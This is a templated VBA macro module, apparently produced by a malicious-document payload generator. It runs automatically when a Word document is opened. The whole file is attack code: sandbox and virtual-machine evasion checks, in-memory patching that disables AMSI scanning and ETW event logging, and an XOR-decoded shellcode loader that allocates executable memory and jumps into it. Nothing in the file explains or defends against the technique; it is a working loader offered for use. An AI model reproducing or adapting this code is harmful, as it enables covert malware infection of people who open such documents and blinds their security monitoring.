Attribute VB_Name = "{{ v.module_name }}"
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function {{ v.fn_callwp }} Lib "user32" Alias "CallWindowProcA" _
        (ByVal lpPrevWndFunc As LongPtr, ByVal hWnd As LongPtr, _
         ByVal Msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr
    Private Declare PtrSafe Function GetProcAddress Lib "kernel32" _
        (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
    Private Declare PtrSafe Function GetCursorPos Lib "user32" (lpPoint As Any) As Long
#End If

Private {{ v.fn_valloc }} As LongPtr
Private {{ v.fn_movemem }} As LongPtr
Private {{ v.fn_vprotect }} As LongPtr

Private Function {{ v.fn_build_str }}(codes() As Integer) As String
    Dim s As String, i As Long
    For i = 0 To UBound(codes)
        s = s & Chr(codes(i))
    Next
    {{ v.fn_build_str }} = s
End Function

Private Sub {{ v.fn_amsi_patch }}()
    On Error Resume Next
    Dim amsiLib As String: amsiLib = {{ v.vba_amsi_dll }}
    Dim scanName As String: scanName = {{ v.vba_amsi_scan_buf }}
    Dim amsiBase As LongPtr: amsiBase = LoadLibraryA(amsiLib)
    If amsiBase = 0 Then Exit Sub
    Dim scanAddr As LongPtr: scanAddr = GetProcAddress(amsiBase, scanName)
    If scanAddr = 0 Then Exit Sub
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, scanAddr, 6, &H40, VarPtr(oldP)
    Dim patch(0 To 5) As Byte
    patch(0) = &HB8: patch(1) = &H57: patch(2) = &H0: patch(3) = &H7: patch(4) = &H80: patch(5) = &HC3
    {{ v.fn_callwp }} {{ v.fn_movemem }}, scanAddr, VarPtr(patch(0)), 6, 0
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, scanAddr, 6, oldP, VarPtr(oldP)
End Sub

Private Sub {{ v.fn_etw_patch }}()
    On Error Resume Next
    Dim ntdllName As String: ntdllName = {{ v.vba_ntdll_dll }}
    Dim etwName As String: etwName = {{ v.vba_etw_event_write }}
    Dim ntdllBase As LongPtr: ntdllBase = LoadLibraryA(ntdllName)
    If ntdllBase = 0 Then Exit Sub
    Dim etwAddr As LongPtr: etwAddr = GetProcAddress(ntdllBase, etwName)
    If etwAddr = 0 Then Exit Sub
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, etwAddr, 4, &H40, VarPtr(oldP)
    Dim p(0 To 3) As Byte
    p(0) = &H31: p(1) = &HC0: p(2) = &HC3: p(3) = &H90
    {{ v.fn_callwp }} {{ v.fn_movemem }}, etwAddr, VarPtr(p(0)), 4, 0
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, etwAddr, 4, oldP, VarPtr(oldP)
End Sub

Private Function {{ v.fn_hex2arr }}(hex As String) As Byte()
    Dim n As Long: n = Len(hex) \ 2
    Dim arr() As Byte: ReDim arr(0 To n - 1)
    Dim i As Long
    For i = 0 To n - 1
        arr(i) = CByte("&H" & Mid$(hex, i * 2 + 1, 2))
    Next
    {{ v.fn_hex2arr }} = arr
End Function

Private Function {{ v.fn_xor }}(data() As Byte, key() As Byte) As Byte()
    Dim n As Long: n = UBound(data)
    Dim k As Long: k = UBound(key) + 1
    Dim out() As Byte: ReDim out(0 To n)
    Dim i As Long
    For i = 0 To n
        out(i) = data(i) Xor key(i Mod k)
    Next
    {{ v.fn_xor }} = out
End Function

Private Function {{ v.fn_sandbox }}() As Boolean
    {{ v.fn_sandbox }} = False
    On Error Resume Next
    If Application.Documents.Count < 1 Then {{ v.fn_sandbox }} = True: Exit Function
    If Application.RecentFiles.Count < 3 Then {{ v.fn_sandbox }} = True: Exit Function
    Dim usr As String: usr = LCase(Environ("USERNAME"))
    Dim badU: badU = Split({{ v.vba_bad_users }}, Chr(124))
    Dim i As Integer
    For i = 0 To UBound(badU)
        If usr = CStr(badU(i)) Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    Dim cname As String: cname = LCase(Environ("COMPUTERNAME"))
    Dim badC: badC = Split({{ v.vba_bad_computers }}, Chr(124))
    For i = 0 To UBound(badC)
        If InStr(cname, CStr(badC(i))) > 0 Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    ' VM/hypervisor registry key checks (paths obfuscated as integer arrays)
    On Error Resume Next
    Dim vmCodes(50) As Integer
    vmCodes(0)=72:vmCodes(1)=75:vmCodes(2)=76:vmCodes(3)=77:vmCodes(4)=92
    vmCodes(5)=83:vmCodes(6)=79:vmCodes(7)=70:vmCodes(8)=84:vmCodes(9)=87
    vmCodes(10)=65:vmCodes(11)=82:vmCodes(12)=69:vmCodes(13)=92:vmCodes(14)=86
    vmCodes(15)=77:vmCodes(16)=119:vmCodes(17)=97:vmCodes(18)=114:vmCodes(19)=101
    vmCodes(20)=44:vmCodes(21)=32:vmCodes(22)=73:vmCodes(23)=110:vmCodes(24)=99
    vmCodes(25)=46:vmCodes(26)=92:vmCodes(27)=86:vmCodes(28)=77:vmCodes(29)=119
    vmCodes(30)=97:vmCodes(31)=114:vmCodes(32)=101:vmCodes(33)=32:vmCodes(34)=84
    vmCodes(35)=111:vmCodes(36)=111:vmCodes(37)=108:vmCodes(38)=115:vmCodes(39)=92
    vmCodes(40)=73:vmCodes(41)=110:vmCodes(42)=115:vmCodes(43)=116:vmCodes(44)=97
    vmCodes(45)=108:vmCodes(46)=108:vmCodes(47)=80:vmCodes(48)=97:vmCodes(49)=116
    vmCodes(50)=104
    Dim wshShell As Object
    Set wshShell = CreateObject({{ v.vba_wscript_shell }})
    wshShell.RegRead {{ v.fn_build_str }}(vmCodes)
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set wshShell = Nothing: Exit Function
    Err.Clear
    Dim vbCodes(54) As Integer
    vbCodes(0)=72:vbCodes(1)=75:vbCodes(2)=76:vbCodes(3)=77:vbCodes(4)=92
    vbCodes(5)=83:vbCodes(6)=79:vbCodes(7)=70:vbCodes(8)=84:vbCodes(9)=87
    vbCodes(10)=65:vbCodes(11)=82:vbCodes(12)=69:vbCodes(13)=92:vbCodes(14)=79
    vbCodes(15)=114:vbCodes(16)=97:vbCodes(17)=99:vbCodes(18)=108:vbCodes(19)=101
    vbCodes(20)=92:vbCodes(21)=86:vbCodes(22)=105:vbCodes(23)=114:vbCodes(24)=116
    vbCodes(25)=117:vbCodes(26)=97:vbCodes(27)=108:vbCodes(28)=66:vbCodes(29)=111
    vbCodes(30)=120:vbCodes(31)=32:vbCodes(32)=71:vbCodes(33)=117:vbCodes(34)=101
    vbCodes(35)=115:vbCodes(36)=116:vbCodes(37)=32:vbCodes(38)=65:vbCodes(39)=100
    vbCodes(40)=100:vbCodes(41)=105:vbCodes(42)=116:vbCodes(43)=105:vbCodes(44)=111
    vbCodes(45)=110:vbCodes(46)=115:vbCodes(47)=92:vbCodes(48)=86:vbCodes(49)=101
    vbCodes(50)=114:vbCodes(51)=115:vbCodes(52)=105:vbCodes(53)=111:vbCodes(54)=110
    wshShell.RegRead {{ v.fn_build_str }}(vbCodes)
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set wshShell = Nothing: Exit Function
    Err.Clear
    Set wshShell = Nothing
    Dim fso2 As Object
    Set fso2 = CreateObject({{ v.vba_fs_obj }})
    On Error Resume Next
    Dim drv2 As Object
    Set drv2 = fso2.GetDrive("C:")
    If Err.Number = 0 Then
        If drv2.TotalSize < 53687091200 Then {{ v.fn_sandbox }} = True: Set fso2 = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set fso2 = Nothing
    Dim wmiSvc3 As Object
    On Error Resume Next
    Set wmiSvc3 = GetObject({{ v.vba_winmgmts }})
    If Err.Number = 0 Then
        Dim prtQ As Object: Set prtQ = wmiSvc3.ExecQuery({{ v.vba_wmi_printer_q }})
        Dim prtCnt As Long: prtCnt = 0
        Dim oPrt As Object
        For Each oPrt In prtQ: prtCnt = prtCnt + 1: Next
        If prtCnt = 0 Then {{ v.fn_sandbox }} = True: Set wmiSvc3 = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set wmiSvc3 = Nothing
    Dim wmiProc As Object
    On Error Resume Next
    Set wmiProc = GetObject({{ v.vba_winmgmts }})
    If Err.Number = 0 Then
        Dim pQ As Object: Set pQ = wmiProc.ExecQuery({{ v.vba_wmi_proc_q }})
        Dim badProc() As String: badProc = Split({{ v.vba_vm_procs }}, "|")
        Dim oP As Object, pn As String, j As Integer
        For Each oP In pQ
            pn = LCase(oP.Name)
            For j = 0 To UBound(badProc)
                If pn = CStr(badProc(j)) Then {{ v.fn_sandbox }} = True: Set wmiProc = Nothing: Exit Function
            Next j
        Next oP
    End If
    On Error GoTo 0
    Set wmiProc = Nothing
    If Environ({{ v.vba_env_vbox }}) <> "" Then {{ v.fn_sandbox }} = True: Exit Function
    If Environ({{ v.vba_env_sandboxie }}) <> "" Then {{ v.fn_sandbox }} = True: Exit Function
End Function

Private Sub {{ v.fn_exec }}()
    If {{ v.fn_sandbox }}() Then Exit Sub
    Dim k32 As LongPtr: k32 = LoadLibraryA({{ v.vba_kernel32 }})
    {{ v.fn_valloc }}  = GetProcAddress(k32, {{ v.vba_virtual_alloc }})
    {{ v.fn_movemem }} = GetProcAddress(k32, {{ v.vba_rtl_move_mem }})
    {{ v.fn_vprotect }} = GetProcAddress(k32, {{ v.vba_virtual_protect }})
    If {{ v.fn_valloc }} = 0 Or {{ v.fn_movemem }} = 0 Or {{ v.fn_vprotect }} = 0 Then Exit Sub
    ' Record cursor before delay; check movement after — no extra wait
    Dim _pt1(1) As Long, _pt2(1) As Long
    GetCursorPos _pt1(0)
    ' Execution delay to defeat sandbox timing
    Dim tStart As Date: tStart = Now
    Do While DateDiff("s", tStart, Now) < 2: DoEvents: Loop
    GetCursorPos _pt2(0)
    If _pt1(0) = _pt2(0) And _pt1(1) = _pt2(1) Then Exit Sub
    Call {{ v.fn_amsi_patch }}
    Call {{ v.fn_etw_patch }}

    Dim sc_hex As String, key_hex As String
    sc_hex  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}
    key_hex = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}

    Dim _k() As Byte
    _k = {{ v.fn_hex2arr }}(key_hex)
    Dim _ki As Long
    For _ki = 0 To UBound(_k): _k(_ki) = _k(_ki) Xor {{ key_tweak }}: Next

    Dim raw() As Byte, sc() As Byte
    raw = {{ v.fn_hex2arr }}(sc_hex)
    sc  = {{ v.fn_xor }}(raw, _k)

    Dim mem As LongPtr
    mem = {{ v.fn_callwp }}({{ v.fn_valloc }}, 0, UBound(sc) + 1, &H3000, &H04)
    If mem = 0 Then Exit Sub
    {{ v.fn_callwp }} {{ v.fn_movemem }}, mem, VarPtr(sc(0)), UBound(sc) + 1, 0
    Dim oldP As Long
    {{ v.fn_callwp }} {{ v.fn_vprotect }}, mem, UBound(sc) + 1, &H20, VarPtr(oldP)

    {{ v.fn_callwp }} mem, 0, 0, 0, 0
End Sub

Public Sub Document_Open()
    Call {{ v.fn_exec }}
End Sub

Public Sub AutoOpen()
    Call {{ v.fn_exec }}
End Sub
